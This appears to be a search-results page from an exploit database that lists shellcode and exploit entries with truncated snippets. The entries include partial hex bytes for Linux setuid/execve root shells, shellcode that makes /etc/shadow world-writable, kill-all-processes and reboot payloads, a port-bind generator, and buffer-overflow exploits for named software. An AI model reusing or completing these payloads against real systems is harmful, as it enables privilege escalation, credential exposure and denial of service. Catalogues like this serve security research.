7261 matches found
linux/x86 reboot() polymorphic shellcode 57 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 reboot polymorphic shellcode 57 bytes ================================================= / Title : reboot polymorphic shellcode - 57 bytes Os: Linux x86 !! Database of shellcodes =...
linux/x86 execve shellcode generator null byte free
No description provided by source. / \ Shellcode Generator null byte free. Author: certaindeath Site: certaindeath.netii.net at the moment under construction This program generates a shellcode which uses the stack to store the command and its arguments. Afterwords it executes the command with the...
linux/x86 reboot() polymorphic shellcode 57 bytes
No description provided by source. / Title : reboot polymorphic shellcode - 57 bytes Os: Linux x86 Author: Jonathan Salwan - submit AT shell-storm.org Web: http://www.shell-storm.org !! Database of shellcodes = http://www.shell-storm.org/shellcode/ / include stdio.h char shellcode =...
HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH)
Exploit for unknown platform in category local exploits ======================================================= HT-MP3Player 1.0 .ht3 Universal Buffer Overflow SEH ======================================================= usage: exploit.py print "" print " HT-MP3Player 1.0 .ht3 Universal Buffer...
linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes
No description provided by source. / Title : Linux/x86 - Shellcode Polymorphic chmod"/etc/shadow",666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes = http://www.shell-storm.org/shellcode/ Informations chmod & exit:...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
Linux/x86 - setuid0 + setgid0 + execve/bin/sh,/bin/sh,NULL Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
Linux/x86 - setuid0 + execve/bin/sh,0 Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do...
linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes
linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes. Shellcode exploit for linx86 platform / Title : Linux/x86 - Shellcode Polymorphic chmod"/etc/shadow",666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes =...
linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes
Exploit for linux/x86 platform in category shellcode ================================================================= linux/x86 Shellcode Polymorphic chmod"/etc/shadow",666 54 bytes ================================================================= / Title : Linux/x86 - Shellcode Polymorphic...
Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit
Exploit for windows platform in category remote exploits ============================================================= Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit ============================================================= / bopup-down.c Copyright c 2008 Bopup Communications...
linux/x86 Shellcode Polymorphic chmod(""/etc/shadow"" 666) 54 bytes
No description provided by source. / Title : Linux/x86 - Shellcode Polymorphic chmod"/etc/shadow",666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes = http://www.shell-storm.org/shellcode/ Informations chmod & exit:...
NetBSD x86 Kill All Processes Shellcode
/ netbsd/x86 kill all processes shellcode author REMOVED AT REQUEST OF AUTHOR contact REMOVED AT REQUEST OF AUTHOR this shellcode is using syscall number 37 or 0x25 37 STD int syskillint pid, int signum; here is assembler code using intel syntaxe and NASM --------------begin----------- section...
netbsd/x86 kill all processes shellcode 23 bytes
No description provided by source. / netbsd/x86 kill all processes shellcode this shellcode is using syscall number 37 or 0x25 37 STD int syskillint pid, int signum; here is assembler code using intel syntaxe and NASM --------------begin----------- section .note.netbsd.ident dd 0x07,0x04,0x01 db...
netbsd/x86 kill all processes shellcode 23 bytes
netbsd/x86 kill all processes shellcode 23 bytes. Shellcode exploit for netbsdx86 platform / netbsd/x86 kill all processes shellcode author Anonymous this shellcode is using syscall number 37 or 0x25 37 STD int syskillint pid, int signum; here is assembler code using intel syntaxe and NASM...
Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)
Linux/x86 - exit0 / exit1 Shellcode 3/4 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x40" // inc %eax // "\x43" // inc %ebx "\xcd\x80"; // int $0x80 int main printf "\n+ Yet conditional %eax==0 Linux/x86 exit0 3 bytes or exit1 4 bytes" "\n+ Date: 18/06/2009" "\n+...
netbsd/x86 kill all processes shellcode 23 bytes
Exploit for netbsd/x86 platform in category shellcode ================================================ netbsd/x86 kill all processes shellcode 23 bytes ================================================ / netbsd/x86 kill all processes shellcode this shellcode is using syscall number 37 or 0x25 37 S...
linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve"/bin/sh",0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"...
solaris/x86 portbind/tcp shellcode generator
No description provided by source. ?php / Utility : Solaris/x86 - Generate PortBind/TCP shellcode Author : Jonathan Salwan Mail : submit ! shell-storm.org More shellcodes in = http://www.shell-storm.org/shellcode/ / function syntax echo "\nSyntax:\nroot@laptop:/ php ./payload.php port\n\n";...
Ares
Ares Galaxy is an open source peer to peer file sharing application that uses its own decentralized supernode network. The latest versions also support the BitTorrent protocol. The use of Ares Galaxy may circumvent the organizational security policy. There are cases in which certain traffic,...
linux/x86 setreuid(geteuid() geteuid()) execve(""/bin/sh"" 0 0) 34 bytes
No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve"/bin/sh",0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"...